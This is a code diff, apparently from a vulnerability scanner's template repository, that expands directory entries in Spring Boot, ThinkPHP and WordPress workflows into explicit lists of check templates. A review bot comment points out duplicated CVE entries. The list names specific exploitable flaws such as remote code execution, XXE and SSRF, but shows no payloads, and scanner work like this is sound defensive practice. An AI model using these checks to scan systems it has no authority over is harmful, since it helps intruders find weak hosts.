@ -10,9 +10,16 @@ info:
workflows:
- template: misconfiguration/springboot-detect.yaml
- template: technologies/detect-springboot-actuator.yaml
subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: vulnerabilities/springboot/
- template: cves/2020/CVE-2020-5410.yaml
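Review bot: `cves/2018/CVE-2018-1271.yaml` and `cves/2020/CVE-2020-5410.yaml` each appear twice in the resulting subtemplate list, so each would run twice against every matched host; keep one entry of each. Since this hunk replaces the `vulnerabilities/springboot/` directory entry with explicit files, it is also the place to check that every template that directory previously pulled in is still listed.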


@ -10,4 +10,7 @@ workflows:
matchers:
- name: thinkphp
subtemplates:
- template: vulnerabilities/thinkphp/
- template: vulnerabilities/thinkphp/thinkphp-2-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml


@ -16,4 +16,20 @@ workflows:
- template: cves/2019/CVE-2019-15858.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml
- template: vulnerabilities/wordpress/
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/wordpress/wordpress-db-backup.yaml
- template: vulnerabilities/wordpress/wordpress-debug-log.yaml
- template: vulnerabilities/wordpress/wordpress-directory-listing.yaml
- template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
- template: vulnerabilities/wordpress/wordpress-emergency-script.yaml
- template: vulnerabilities/wordpress/wordpress-installer-log.yaml
- template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
- template: vulnerabilities/wordpress/wordpress-user-enumeration.yaml
- template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wp-xmlrpc.yaml